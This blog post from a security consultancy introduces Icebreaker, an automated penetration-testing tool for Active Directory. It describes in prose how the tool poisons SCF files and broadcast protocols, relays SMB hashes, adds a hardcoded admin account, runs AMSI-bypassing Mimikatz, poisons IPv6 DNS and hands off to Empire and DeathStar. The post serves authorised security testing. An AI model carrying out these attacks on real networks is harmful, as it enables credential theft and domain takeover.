Icebreaker: Chip Away at Active Directory Passwords, Automatically

March 16, 2018, Dan McInerney, Senior Security Consultant, Coalfire

To break the ice with Active Directory and shorten the cycles penetration testers spend on cracking passwords, I developed Icebreaker, a tool that automates network attacks against Active Directory and provides plaintext credentials.

Icebreaker performs five network attacks in order:

  1. Reverse bruteforce: Uses several techniques to find valid and potentially valid domain usernames, which are tested against two of the most common Active Directory passwords.
  2. Malicious file upload: Writes a malicious SCF to available network shares that, when opened in explorer by domain users, will send their password hash to the attacker.
  3. Broadcast protocol poisoning: Poisons layer two broadcast protocols to trick domain users’ machines into sending their password hash to the attacker.
  4. SMB relay: Man-in-the-middle attacks SMB connections to gain remote code execution against victim machines. Icebreaker will add a new administrative user to the machine as well as run and parse Mimikatz on it.
  5. IPv6 DNS poison: Poisons IPv6 DNS requests to trick users’ browsers into sending their password hash to the attacker.

Attack 1, reverse bruteforce, and Attack 2, malicious file upload, usually go pretty quickly; then it lingers on Attack 3, broadcast protocol poisoning, for 10 minutes by default. After that amount of time (or the user-specified amount of time) has passed, it will move onto the final two attacks, which are run in parallel and indefinitely.

If any hosts that allow null SMB sessions are discovered, Icebreaker will use ridenum to perform RID cycling for valid usernames. If you use the "-d <>" option, theHarvester will scrape any email addresses from the specified website. Any email usernames that are AD-compatible will be added to the reverse bruteforce username list. Icebreaker uses the asyncio library to perform the reverse bruteforce using the Linux tool rpcclient using 10 async workers.

The SCF upload attack abuses Shell Command Files (SCFs) against anonymously writeable network shares. SCFs are files that can perform basic actions like showing the desktop or opening a File Explorer window. They have the curious property of allowing you to set its file icon to a network path. If you set this network path to your own machine, users who open the file share in File Explorer will automatically send their NetNTLMv2 password hash to you. Icebreaker uses the Nmap script smb-enum-shares to find anonymously writeable shares then automatically generates and uploads the payloaded SCF.

Attack 3 uses to poison LLMNR, NBT-NS, and mDNS multicast/broadcast protocols. When users navigate to a nonexistent network path, Responder will tell them your attacker machine is the correct path. The user's NetNTLMv2 password hash is now yours. Responder will capture hashes sent via the SCF attack, but the next attack is generally more useful for capturing SCF hashes because it has the potential of using the hash for command execution.

SMB relay is an old network attack where attackers place themselves in between the SMB client and the SMB server. This allows attackers to capture and relay NetNTLMv2 hashes to hosts that have SMBv1 enabled and SMB signing disabled. from the Impacket library is used to relay while is used to man-in-the-middle SMB connections. Should the SMB client user have administrative rights to any host on the network that has SMB signing disabled, will perform command execution on that host.

Once ntlmrelayx relays a captured hash it will run a base64-encoded powershell command that first adds an administrative user (icebreaker:P@ssword123456), then runs an obfuscated and AMSI-bypassing version of Mimikatz. This Mimikatz output is parsed for plaintext passwords or NTLM hashes and delivered to the user in the standard output as well as in the found-passwords.txt file. NTLM hashes, unlike NetNTLMv2 hashes, can be used just like a plaintext password for authentication to other AD hosts. One caveat to note is that ever since Microsoft’s KB2871997 patch was released, only the built-in RID 500 local administrator account can be used in pass-the-hash attacks.

The final attack uses the tool mitm6 to perform a man-in-the-middle IPv6 DNS attack against the whole network. This forces hosts on the network to use the attacker's machine as their DNS server. Once set as their DNS server, the attacker serves malicious WPAD proxy setting files to the victim’s and gathers their NetNTLMv2 hashes. These hashes are relayed using for further remote code execution possibilities. One thing to note is that this attack is prone to causing issues on the network. It often causes certificate errors on client machines in the browser. It will also likely slow the network down. The beauty of this attack, however, is that Windows AD environments are vulnerable by default.

If Icebreaker is run with the --auto [tmux/xterm] flag, then upon reaching attack 4 Icebreaker will run Empire and DeathStar in either a tmux session or xterm windows. With this option, instead of running Mimikatz on the remote host that we relayed the hash to, Icebreaker will add an administrative user, then run Empire's powershell launcher code to get an agent on the remote machine. DeathStar will use this agent to automate the process of achieving domain admin. The Empire and DeathStar will not close when you exit Icebreaker.

Password cracking is done with JohnTheRipper and a custom wordlist. The origin of this list is from the merged.txt, which is every password from the SecLists GitHub account combined. The wordlist was pruned and includes no passwords with: all lowercase, all uppercase, all symbols, less than 7 characters, more than 32 characters. These rules conform to the default Active Directory password requirements and brought the list from 20 million to just over 1 million, making password cracking extremely fast.

Dan McInerney


Dan McInerney — Senior Security Consultant, Coalfire

Recent Posts

Post Topics